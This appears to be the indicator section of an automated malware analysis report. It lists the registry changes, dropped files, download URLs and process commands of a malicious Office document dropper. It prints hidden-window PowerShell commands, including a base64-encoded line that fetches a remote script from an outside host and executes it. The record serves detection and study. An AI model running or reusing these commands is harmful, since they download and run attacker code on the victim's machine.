Technical Information
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1400' = '00000003'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1C00' = '00000000'
- %APPDATA%\qfqe.docx
- %APPDATA%\~$qfqe.docx
- %APPDATA%\blues.exe
- '19#.#3.191.248':7287
- http://19#.##.191.248:7287/qfqe.docx via 19#.#3.191.248
- http://19#.##.191.248:7287/blues.exe via 19#.#3.191.248
- '%APPDATA%\blues.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function JvDwvkxdl($cobkto, $hDkcYdvzqCMEtxmV){[IO.File]::WriteAllBytes($cobkto, $hDkcYdvzqCMEtxmV)};function fLnFWmdHFRPDpphK($cobkto){if($cobkto.EndsWith((WgWepI...' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%APPDATA%\qfqe.docx"
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADEAOQA0AC4AMwAzAC4AMQA5ADEALgAyADQAOAA6ADcAMgA4ADcALwBzAHkAcwAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHwAIAB...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADEAOQA0AC4AMwAzAC4AMQA5ADEALgAyADQAOAA6ADcAMgA4ADcALwBzAHkAcwAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHwAIABpAGUAeAA=